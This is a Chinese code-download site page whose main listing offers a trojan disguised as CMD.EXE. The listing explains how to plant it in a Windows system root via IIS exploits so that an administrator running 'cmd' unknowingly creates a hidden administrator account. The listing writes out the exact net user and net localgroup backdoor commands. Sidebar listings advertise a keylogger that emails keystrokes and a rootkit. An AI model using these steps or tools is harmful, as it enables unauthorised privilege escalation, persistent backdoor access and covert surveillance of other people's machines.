网站首页

登录

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...

于 2022-06-01 发布文件大小:18.50 kB

 0  114

下载积分: 2 下载次数: 1

我要下载

代码说明：

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限这个时候, 就可以把本程序放到目标机器的系统盘根目录只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code

下载说明：请别用迅雷下载，失败请重下，重下不扣分！

发表评论

0 个回复

site visits to a limit of small programs java
给网站增加访问限制一个java的小程序-site visits to a limit of small programs java

2023-02-19 04:45:03下载

积分：1
聚类算法在网络入侵检测中的应用
聚类算法在网络入侵检测中的应用-clustering algorithm in Network Intrusion Detection Application

2022-11-23 10:25:03下载

积分：1
c algorithm commonly used procedures set
c常用算法程序集-c algorithm commonly used procedures set

2022-08-03 08:24:53下载

积分：1
1. In windows2000server versions of a control panel to add to delete windows add...
1.必须在windows2000server以上版本的控制面板的添加删除windows组件里添加安装IIS服务 2.安装SQLserver2000数据库.用户名sa,密码:无 3.再把整个林业管理文件夹复制到D盘的根目录下 4.执行林业管理文件夹中的setposup.Bat文件，这将自动创建数据库 5.打开internet信息管理器(IIS),(在控制面板的管理工具中找到它) 6.用Internnet信息管理器新建一个虚拟目录,名称任意设置,把虚拟目录指向D:林业管理即可林业管理系统里面的管理员名是:admin 密码:无进入后可选择更改密码.-1. In windows2000server versions of a control panel to add to delete windows add components to install IIS services 2. Installation SQLserver2000 database. Sa user name, password : None 3. Then the entire forestry management folder copied to the D-4 under the root directory. Implementation of the management of forestry items folder setposup.Bat the document, it will automatically create a database five. open internet information management (IIS), (the control panel management tools find it) 6. Internnet with new information management for a virtual directory name arbitrary setup, virtual directory pointing D : forestry management can forestry management system inside the administrators are : admin password : None

2022-05-27 07:48:31下载

积分：1
记录键盘的VB源代码,保存起来,并且到一定时候发送到指定的Email
记录键盘的VB源代码,保存起来,并且到一定时候发送到指定的Email- Records the keyboard the VB source code, preserves, and to certain time transmits to which assigns Email

2022-01-26 03:41:28下载

积分：1
仿照书本创建进程的方法，在父进程中创建两个进程，然后根据实验要求更改，观察，理解进程的运行过程。...
仿照书本创建进程的方法，在父进程中创建两个进程，然后根据实验要求更改，观察，理解进程的运行过程。-Create a process modeled on the books method, the parent process to create two processes, and then request to change the basis of experiment, observation and understanding of the process is running.

2023-01-24 22:00:04下载

积分：1
著名的PEEPER代码！
著名的PEEPER代码！-famous PEEPER code!

2023-05-03 21:00:03下载

积分：1
snmp vc++6编程
snmp vc++6编程-snmp vc++6 programming

2023-06-19 04:20:03下载

积分：1
rootkit工具，可以隐藏进程和驱动
rootkit工具，可以隐藏进程和驱动-rootkit tool to hide processes and drive

2023-05-02 06:40:04下载

积分：1
网吧计费管理系统，服务器
网吧计费管理系统,服务器端和客户端的源代码-Internet cafe billing management systems, server-side and client source code

2022-05-14 15:58:05下载

积分：1

696518资源总数
106227会员总数
11今日下载